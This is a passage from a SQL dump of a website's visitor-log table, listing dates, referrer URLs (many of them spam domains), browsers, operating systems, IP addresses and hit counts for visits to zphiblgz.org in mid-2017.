91.210.145.187','000',25,0),(6561,'2017-06-28','http://video-chat.in/','MSIE','Unknown','6.0','','37.229.253.71','000',3,0),(6562,'2017-06-28','zphiblgz.org/shop','Chrome','Windows','5.0.375.99','','65.99.237.26','000',1,0),(6563,'2017-06-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.34','000',1,0),(6564,'2017-06-28','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','23.19.205.76','000',1,0),(6565,'2017-06-28','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','192.199.246.191','000',2,0),(6566,'2017-06-28','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.140.165.18','000',2,0),(6567,'2017-06-28','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','66.11.118.223','000',2,0),(6568,'2017-06-28','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','199.195.130.177','000',2,0),(6569,'2017-06-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','104.194.193.55','000',2,0),(6570,'2017-06-28','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','76.191.112.180','000',2,0),(6571,'2017-06-28','http://zphiblgz.org','Firefox','Windows','40.1','','85.121.125.228','000',1,0),(6572,'2017-06-28','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(6573,'2017-06-28','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(6574,'2017-06-28','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1466.5N5BBuI5RBq0p5eRRECb6VBtwN04Zg7AmE9yWxX3bUgEk7fazZT1V02FuvHO28lV.fa61bd724d2351defd4e028a9345de58c1d9afef&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YFUVNhHyyhJgRFg5yeLMIWU&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSTZyLVphbUQ1eUhPRHJVdVpmVnlpVktwZDZRekstelduOXpSbmZLemdTTmRkY2QzNHMteU9M&b64e=2&sign=665f64c11492948aaa1323d5bc44e889&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYpgPUyh7uQlJ9Uj0CkkEYbh145ITnwv3ircowwZWst_MOuUI87SegJHBmxqreKCHWg04DxMiZq4KXE2cIebQVvv0f9lc5-AlE8v63HoD-nf_Dhda845QaSbQVyjQotP-qWsO-B1VVMs&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV-HtQ36UFK00CSSQe77ZdKCR6vL0R9_z6HoDm2v2SpZYxwpzb__qNNRjJWLYfai8dBvMi2ZvRF0g&l10n=ru&cts=1498674843086&mc=3.42919289294','MSIE','Windows','8.0','','95.24.112.241','000',1,0),(6575,'2017-06-28','https://buydissertation.net/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6576,'2017-06-28','http://zphiblgz.org','Firefox','Windows','40.1','','177.201.114.226','000',1,0),(6577,'2017-06-28','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','162.217.174.113','000',2,0),(6578,'2017-06-28','http://chatroulette.si/','MSIE','Windows','5.5','','46.118.124.89','000',2,0),(6579,'2017-06-28','http://zphiblgz.org','Firefox','Windows','10.0.1','','31.202.216.197','000',1,0),(6580,'2017-06-28','https://dellalimov.com/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(6581,'2017-06-28','http://krasnodar.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',2,0),(6582,'2017-06-28','http://demian.kz/','MSIE','Windows','6.0','','46.118.124.89','000',3,0),(6583,'2017-06-28','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.74','000',1,0),(6584,'2017-06-28','http://zphiblgz.org','Firefox','Windows','40.1','','198.58.157.73','000',2,0),(6585,'2017-06-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.114','000',1,0),(6586,'2017-06-28','http://zphiblgz.org/','Firefox','Windows','50.0','','59.49.50.206','000',1,0),(6587,'2017-06-28','zphiblgz.org','Opera','Windows','8.50','','192.157.253.164','000',1,0),(6588,'2017-06-28','http://zphiblgz.org','Unknown','Unknown','Unknown','','185.170.41.8','000',1,0),(6589,'2017-06-29','http://bestdraws.com/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(6590,'2017-06-29','http://stal-rulon.ru/','MSIE','Windows','6.0','','46.118.124.89','000',2,0),(6591,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','52.169.74.227','000',2,0),(6592,'2017-06-29','http://www.pechikamini.ru/','Opera','Windows','8.50','','46.118.117.158','000',6,0),(6593,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.238.169.57','000',4,0),(6594,'2017-06-29','http://ulyanovsk.zrus.org/','Unknown','Unknown','Unknown','','46.119.116.109','000',2,0),(6595,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.243.166.137','000',2,0),(6596,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.209.252.138','000',1,0),(6597,'2017-06-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','65.19.167.132','000',1,0),(6598,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.223.27.241','000',1,0),(6599,'2017-06-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','92.222.78.189','000',2,0),(6600,'2017-06-29','http://zphiblgz.org','Firefox','Windows','40.1','','39.43.5.236','000',2,0),(6601,'2017-06-29','http://kemerovo.zrus.org/','Opera','Windows','6.0','','46.118.125.174','000',3,0),(6602,'2017-06-29','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','185.208.209.3','000',1,0),(6603,'2017-06-29','http://videochat.ph/','Opera','Windows','7.0','','46.118.124.89','000',1,0),(6604,'2017-06-29','http://zphiblgz.org','G-i-g-a-b-o-t','Unknown','Unknown','','65.132.59.34','000',2,0),(6605,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','213.61.149.100','000',2,0),(6606,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.135.190','000',2,0),(6607,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',2,0),(6608,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.191.54','000',1,0),(6609,'2017-06-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.212.115','000',5,0),(6610,'2017-06-29','http://nac-bearings.ru/','MSIE','Windows','5.0','','46.118.117.158','000',3,0),(6611,'2017-06-29','http://zphiblgz.org/','Chrome','Windows','48.0.2564.97','','193.201.225.139','000',1,0),(6612,'2017-06-29','http://zphiblgz.org','Opera','Windows','12.14','','54.157.216.95','000',1,0),(6613,'2017-06-29','http://zphiblgz.org','Firefox','Windows','40.1','','41.108.154.109','000',2,0),(6614,'2017-06-29','http://zphiblgz.org','Firefox','Windows','40.1','','95.199.23.64','000',2,0),(6615,'2017-06-29','http://zphiblgz.org','Firefox','Windows','40.1','','111.94.100.169','000',1,0),(6616,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','69.162.123.166','000',2,0),(6617,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(6618,'2017-06-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(6619,'2017-06-29','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(6620,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.66.162','000',1,0),(6621,'2017-06-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','5.196.89.94','000',1,0),(6622,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.58.100.240','000',2,0),(6623,'2017-06-29','http://zphiblgz.org','Safari','iPhone','10.0','','66.87.81.218','000',3,0),(6624,'2017-06-29','https://landscaping.center/','MSIE','Windows','5.0','','46.118.125.174','000',2,0),(6625,'2017-06-29','http://zphiblgz.org','MSIE','Windows','7.0','','41.66.8.10','000',1,0),(6626,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.230.97','000',2,0),(6627,'2017-06-29','https://search.yahoo.com/','Chrome','Windows','59.0.3071.115','','24.209.14.99','000',2,0),(6628,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',1,0),(6629,'2017-06-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.170.41.8','000',1,0),(6630,'2017-06-29','http://zphiblgz.org','Firefox','Windows','40.1','','46.154.44.33','000',1,0),(6631,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',2,0),(6632,'2017-06-29','http://zphiblgz.org/','Opera Next','Windows','26.0.1656.60','','193.238.133.91','000',1,0),(6633,'2017-06-29','http://zphiblgz.org/membership/','Opera Next','Windows','26.0.1656.60','','217.219.157.90','000',2,0),(6634,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.10.158','000',2,0),(6635,'2017-06-29','http://zphiblgz.org','Opera Next','Windows','26.0.1656.60','','192.198.80.227','000',1,0),(6636,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',2,0),(6637,'2017-06-29','http://zphiblgz.org','Firefox','Windows','40.1','','159.245.36.130','000',1,0),(6638,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.208.209.2','000',2,0),(6639,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.40.233','000',1,0),(6640,'2017-06-29','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.220.35.202','000',1,0),(6641,'2017-06-29','http://topkarkas.com/','Opera','Windows','8.00','','46.118.117.158','000',2,0),(6642,'2017-06-29','http://companies-catalog.com/','MSIE','Windows','5.0','','178.137.4.41','000',3,0),(6643,'2017-06-29','http://uptime.com/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.18','000',1,0),(6644,'2017-06-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.22','000',1,0),(6645,'2017-06-29','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(6646,'2017-06-29','http://nefteyugansk.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',5,0),(6647,'2017-06-29','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.90','000',1,0),(6648,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.2','000',2,0),(6649,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.196','000',2,0),(6650,'2017-06-29','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',2,0),(6651,'2017-06-29','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.28','000',1,0),(6652,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.39.41','000',1,0),(6653,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.10.158','000',1,0),(6654,'2017-06-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.171.40','000',1,0),(6655,'2017-06-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.119','000',1,0),(6656,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.56.25','000',1,0),(6657,'2017-06-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','178.17.174.32','000',1,0),(6658,'2017-06-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.125','000',3,0),(6659,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.216','000',4,0),(6660,'2017-06-30','http://krasnoyarsk.zrus.org/','Opera','Windows','9.0','','46.119.116.109','000',1,0),(6661,'2017-06-30','http://zphiblgz.org','Chrome','Windows','39.0.2171.99','','192.198.80.227','000',3,0),(6662,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.61','000',2,0),(6663,'2017-06-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.123','000',3,0),(6664,'2017-06-30','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6665,'2017-06-30','https://letsart.ru/','MSIE','Windows','5.5','','178.137.4.41','000',2,0),(6666,'2017-06-30','http://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','54.215.217.8','000',1,0),(6667,'2017-06-30','http://zphiblgz.org','Chrome','Macintosh','40.0.2214.93','','52.53.130.82','000',1,0),(6668,'2017-06-30','http://zphiblgz.org','Firefox','Windows','40.1','','175.157.26.36','000',2,0),(6669,'2017-06-30','http://chatroulette.si/','MSIE','Windows','6.0','','46.118.124.89','000',6,0),(6670,'2017-06-30','http://khantymansiysk.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',2,0),(6671,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(6672,'2017-06-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.100.85.101','000',1,0),(6673,'2017-06-30','http://zphiblgz.org','Firefox','Windows','40.1','','93.152.172.178','000',1,0),(6674,'2017-06-30','http://www.marinetraffic.com','MSIE','Unknown','9.0','','139.227.145.172','000',1,0),(6675,'2017-06-30','http://zphiblgz.org','Firefox','Windows','40.1','','202.142.157.132','000',1,0),(6676,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.196','000',2,0),(6677,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.213.3.221','000',2,0),(6678,'2017-06-30','http://zphiblgz.org','Firefox','Windows','40.1','','117.222.75.178','000',2,0),(6679,'2017-06-30','http://barnaul.zrus.org/','Opera','Windows','7.0','','46.119.116.109','000',2,0),(6680,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.95.180','000',1,0),(6681,'2017-06-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(6682,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.67.180','000',2,0),(6683,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.22.24.162','000',2,0),(6684,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.167.96','000',2,0),(6685,'2017-06-30','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(6686,'2017-06-30','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',2,0),(6687,'2017-06-30','http://zphiblgz.org','MSIE','Windows','6.0','','93.170.131.47','000',1,0),(6688,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.136.101','000',2,0),(6689,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.245.60.8','000',2,0),(6690,'2017-06-30','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.37','000',1,0),(6691,'2017-06-30','http://zphiblgz.org','Firefox','Windows','40.1','','39.57.15.252','000',1,0),(6692,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','89.32.127.178','000',2,0),(6693,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','80.209.252.138','000',2,0),(6694,'2017-06-30','https://maslenka.kz/','MSIE','Unknown','6.0','','46.118.125.174','000',2,0),(6695,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.84.108','000',2,0),(6696,'2017-06-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',2,0),(6697,'2017-06-30','http://ivanovo.zrus.org/','Opera','Windows','8.01','','46.119.116.109','000',2,0),(6698,'2017-06-30','http://zphiblgz.org','MSIE','Windows','6.0','','62.75.195.67','000',1,0),(6699,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(6700,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','195.154.209.57','000',2,0),(6701,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.101.137','000',2,0),(6702,'2017-07-01','http://zphiblgz.org','Ruby','Unknown','Unknown','','54.193.104.83','000',42,0),(6703,'2017-07-01','http://zphiblgz.org','Chrome','Linux','59.0.3071.115','','54.193.110.110','000',1,0),(6704,'2017-07-01','http://zphiblgz.org','Chrome','Macintosh','50.0.2661.102','','54.193.104.83','000',41,0),(6705,'2017-07-01','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','206.41.177.239','000',1,0),(6706,'2017-07-01','http://zphiblgz.org','Firefox','Windows','40.1','','117.196.166.156','000',1,0),(6707,'2017-07-01','https://coindirect.io/','MSIE','Windows','5.5','','46.118.117.158','000',2,0),(6708,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','198.245.60.8','000',2,0),(6709,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','67.205.146.164','000',2,0),(6710,'2017-07-01','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(6711,'2017-07-01','http://astrakhan.zrus.org/','MSIE','Windows','6.0','','46.119.116.109','000',3,0),(6712,'2017-07-01','http://zphiblgz.org','Firefox','Windows','40.1','','47.15.9.110','000',2,0),(6713,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.196.1.129','000',2,0),(6714,'2017-07-01','http://zphiblgz.org','MSIE','Windows','9.0','','195.154.217.116','000',16,0),(6715,'2017-07-01','https://stop-gepatit.te.ua/','MSIE','Windows','7.0b','','178.137.4.41','000',2,0),(6716,'2017-07-01','http://zphiblgz.org','Firefox','Windows','40.1','','75.162.200.47','000',2,0),(6717,'2017-07-01','http://kozhniebolezni.com/','MSIE','Windows','6.0','','46.118.125.174','000',2,0),(6718,'2017-07-01','http://www.zetmaster.ru/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6719,'2017-07-01','http://cheboksary.zrus.org/','Unknown','Unknown','Unknown','','46.118.125.174','000',2,0),(6720,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.82','000',2,0),(6721,'2017-07-01','http://videochat.life/','Opera','Windows','6.01','','46.118.124.89','000',2,0),(6722,'2017-07-01','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.88','000',1,0),(6723,'2017-07-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(6724,'2017-07-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(6725,'2017-07-01','http://zphiblgz.org/wp-includes/x.php','Chrome','Windows','42.0.2311.152','','209.90.225.226','000',1,0),(6726,'2017-07-01','https://stop-gepatit.te.ua/','Unknown','Unknown','Unknown','','178.137.4.41','000',3,0),(6727,'2017-07-01','http://zphiblgz.org/','Firefox','Windows','34.0','','81.216.204.190','000',4,0),(6728,'2017-07-01','http://podshipniki-ntn.ru/','Opera','Windows','7.54','','178.137.4.41','000',3,0),(6729,'2017-07-01','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',1,0),(6730,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.238.169.81','000',1,0),(6731,'2017-07-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.183.218.199','000',1,0),(6732,'2017-07-01','http://zphiblgz.org','Firefox','Windows','40.1','','179.181.190.176','000',2,0),(6733,'2017-07-01','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','209.200.35.222','000',1,0),(6734,'2017-07-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','209.200.35.221','000',1,0),(6735,'2017-07-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.194','000',1,0),(6736,'2017-07-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.53.83','000',1,0),(6737,'2017-07-01','https://inome.com.ua/','MSIE','Windows','6.0','','46.118.117.158','000',2,0),(6738,'2017-07-01','http://zphiblgz.org','MSIE','Windows','6.0','','31.184.243.234','000',1,0),(6739,'2017-07-01','http://www.zphiblgz.org','Chrome','Windows','34.0.1847.137','','104.236.57.129','000',2,0),(6740,'2017-07-01','http://videochat.tv.br/','Unknown','Unknown','Unknown','','46.118.124.89','000',3,0),(6741,'2017-07-01','http://zphiblgz.org','Firefox','Windows','40.1','','117.199.72.32','000',1,0),(6742,'2017-07-01','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.21','000',1,0),(6743,'2017-07-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.20','000',1,0),(6744,'2017-07-01','http://zphiblgz.org','Firefox','Windows','40.1','','191.125.137.27','000',2,0),(6745,'2017-07-02','http://zphiblgz.org','Safari','iPhone','602.1','','107.206.244.53','000',1,0),(6746,'2017-07-02','http://zphiblgz.org','MSIE','Windows','10.0','','144.76.80.151','000',1,0),(6747,'2017-07-02','http://zphiblgz.org','MSIE','Windows','9.0','','213.239.205.118','000',5,0),(6748,'2017-07-02','http://zphiblgz.org','Firefox','Windows','40.1','','156.204.255.112','000',2,0),(6749,'2017-07-02','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(6750,'2017-07-02','http://zphiblgz.org','Firefox','Windows','35.0','','192.198.80.227','000',3,0),(6751,'2017-07-02','http://free-gluten.ru/','MSIE','Windows','6.0','','46.118.117.158','000',3,0),(6752,'2017-07-02','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','192.95.29.116','000',2,0),(6753,'2017-07-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(6754,'2017-07-02','http://zphiblgz.org/wp-login.php','Firefox','Windows','46.0','','27.34.20.138','000',1,0),(6755,'2017-07-02','https://woweb.com.ua/','Opera','Windows','7.02','','46.118.124.89','000',1,0),(6756,'2017-07-02','http://zphiblgz.org','Firefox','Windows','40.1','','41.202.64.141','000',1,0),(6757,'2017-07-02','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.62','000',1,0),(6758,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.220.128','000',2,0),(6759,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.170','000',2,0),(6760,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.23.248.36','000',2,0),(6761,'2017-07-02','http://zphiblgz.org','Firefox','Windows','27.0','','91.247.36.240','000',1,0),(6762,'2017-07-02','http://zphiblgz.org','Firefox','Windows','40.1','','41.176.112.114','000',1,0),(6763,'2017-07-02','http://bestdraws.com/','Unknown','Unknown','Unknown','','46.118.125.174','000',3,0),(6764,'2017-07-02','http://kemerovo.zrus.org/','MSIE','Windows','6.0','','46.118.125.174','000',3,0),(6765,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',2,0),(6766,'2017-07-02','http://zphiblgz.org','Firefox','Windows','40.1','','193.77.153.39','000',1,0),(6767,'2017-07-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(6768,'2017-07-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',5,0),(6769,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.48.253','000',2,0),(6770,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.213.3.221','000',2,0),(6771,'2017-07-02','https://letsart.ru/','Unknown','Unknown','Unknown','','46.119.116.109','000',6,0),(6772,'2017-07-02','https://www.google.com/','Edge','Windows','14.14393','','108.45.47.121','000',4,0),(6773,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.87','000',2,0),(6774,'2017-07-02','http://www.4istoshop.com/','MSIE','Windows','7.0a1','','46.118.117.158','000',3,0),(6775,'2017-07-02','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.19','000',1,0),(6776,'2017-07-02','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.65','000',1,0),(6777,'2017-07-02','http://www.zphibmaryland.org/chapters/','Chrome','Windows','59.0.3071.115','','192.126.96.23','000',16,0),(6778,'2017-07-02','http://zphiblgz.org/robots.txt','Chrome','Macintosh','42.0.2356.50','','88.99.68.199','000',1,0),(6779,'2017-07-02','http://zphiblgz.org','Chrome','Linux','12.0.742.112','','188.165.208.29','000',85,0),(6780,'2017-07-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.124.32.84','000',1,0),(6781,'2017-07-02','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(6782,'2017-07-03','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(6783,'2017-07-03','http://zphiblgz.org','MSIE','Windows','11.0','','37.187.78.81','000',1,0),(6784,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','211.208.99.14','000',1,0),(6785,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','27.4.177.159','000',2,0),(6786,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','180.191.61.11','000',1,0),(6787,'2017-07-03','http://videochat.world/','MSIE','Windows','6.0','','46.118.125.174','000',1,0),(6788,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.201.225.45','000',1,0),(6789,'2017-07-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.191.54','000',1,0),(6790,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','60.96.4.126','000',1,0),(6791,'2017-07-03','http://zphiblgz.org','Chrome','Linux','17.0.963.65','','190.187.163.113','000',1,0),(6792,'2017-07-03','http://zphiblgz.org','Chrome','Windows','12.0.742.112','','190.187.163.113','000',1,0),(6793,'2017-07-03','http://zphiblgz.org','Chrome','Windows','12.0.724.100','','190.187.163.113','000',1,0),(6794,'2017-07-03','http://zphiblgz.org','Chrome','Linux','12.0.702.0','','190.187.163.113','000',2,0),(6795,'2017-07-03','http://zphiblgz.org','Chrome','Macintosh','14.0.790.0','','190.187.163.113','000',1,0),(6796,'2017-07-03','http://zphiblgz.org','Chrome','Macintosh','18.0.1025.11','','190.187.163.113','000',1,0),(6797,'2017-07-03','http://zphiblgz.org','Chrome','Linux','10.0.648.127','','190.187.163.113','000',1,0),(6798,'2017-07-03','http://zphiblgz.org','Chrome','Windows','13.0.782.41','','190.187.163.113','000',2,0),(6799,'2017-07-03','http://zphiblgz.org','Chrome','Windows','12.0.706.0','','190.187.163.113','000',1,0),(6800,'2017-07-03','http://zphiblgz.org','Chrome','Windows','15.0.860.0','','190.187.163.113','000',1,0),(6801,'2017-07-03','http://zphiblgz.org','Chrome','Macintosh','13.0.782.41','','190.187.163.113','000',1,0),(6802,'2017-07-03','http://zphiblgz.org','Chrome','Linux','10.0.648.0','','190.187.163.113','000',1,0),(6803,'2017-07-03','http://zphiblgz.org','Chrome','Windows','19.0.1062.0','','190.187.163.113','000',1,0),(6804,'2017-07-03','http://zphiblgz.org','Chrome','Linux','17.0.963.12','','190.187.163.113','000',1,0),(6805,'2017-07-03','http://zphiblgz.org','Chrome','Linux','19.0.1042.0','','190.187.163.113','000',1,0),(6806,'2017-07-03','http://zphiblgz.org','Chrome','Chrome OS','13.0.782.14','','190.187.163.113','000',1,0),(6807,'2017-07-03','http://zphiblgz.org','Chrome','Windows','10.0.601.0','','190.187.163.113','000',1,0),(6808,'2017-07-03','http://khantymansiysk.zrus.org/','Opera','Windows','6.01','','46.118.125.174','000',2,0),(6809,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.19.181.25','000',2,0),(6810,'2017-07-03','https://vpnmouse.com/','Unknown','Unknown','Unknown','','46.118.124.89','000',2,0),(6811,'2017-07-03','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(6812,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','210.124.172.144','000',1,0),(6813,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','104.223.123.98','000',1,0),(6814,'2017-07-03','https://2000k.ru/','Opera','Windows','8.01','','178.137.4.41','000',3,0),(6815,'2017-07-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','132.255.220.2','000',1,0),(6816,'2017-07-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','182.92.224.62','000',1,0),(6817,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.29.8.132','000',2,0),(6818,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.2.75.199','000',2,0),(6819,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.171.49','000',2,0),(6820,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','108.56.199.13','000',2,0),(6821,'2017-07-03','zphiblgz.org','Chrome','Windows','50.0.2661.75','','158.69.218.171','000',1,0),(6822,'2017-07-03','http://chatroulette.video/','MSIE','Windows','6.0','','46.118.124.89','000',4,0),(6823,'2017-07-03','https://inome.com.ua/','MSIE','Windows','6.0','','46.118.117.158','000',1,0),(6824,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','14.192.209.220','000',2,0),(6825,'2017-07-03','http://zphiblgz.org','Firefox','Windows','40.1','','76.68.184.4','000',1,0),(6826,'2017-07-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.164','000',2,0),(6827,'2017-07-03','http://podshipniki-ntn.ru/','MSIE','W